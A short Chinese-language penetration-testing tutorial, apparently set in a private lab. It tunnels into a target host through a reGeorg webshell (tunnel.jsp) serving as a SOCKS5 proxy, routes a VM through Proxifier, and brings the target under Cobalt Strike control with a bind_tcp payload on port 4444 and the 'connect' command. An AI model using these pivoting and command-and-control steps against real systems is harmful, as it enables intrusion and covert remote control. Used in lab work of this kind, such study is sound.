一:本地正向代理目标
如下,本地(10.211.55.2)挂好了基于 reGeorg 的 http 正向代理。代理为: Socks5
10.211.55.2 1080python2 reGeorgSocksProxy.py -l 0.0.0.0 -p 1080 -u http://10.211.55.3:8080/shiro/tunnel.jsp
二:虚拟机配置proxifer
我们是本地正向到目标机器想要上线cs
咱也不能直接把木马在本机上执行嘛,不太好,所以在虚拟机中配置proxifer把代理服务器是本地机器(10.211.55.2)
规则是只要目标机器(10.211.55.3)的流量
三:虚拟机反向上线cs
cs生成一个反向木马的exe在虚拟机上面执行就行
四:cs生成bind.exe
cs创建bind_tcp的监听 生成一个bind的exe在目标机器上面执行
注:bind.exe只是在目标机器上面执行了一个监听端口 在执行了bind.exe后 目标机器会 监听自己的4444端口(等待连接)
5:cs connect 主动连接
在已上线的虚拟机 10.211.55.7 会话中执行 connect 命令主动连接目标机器 10.211.55.3,
#连接
connect 10.211.55.3
可以看到 10.211.55.3 成功上线,该机器是通过 10.211.55.7 连接上线的
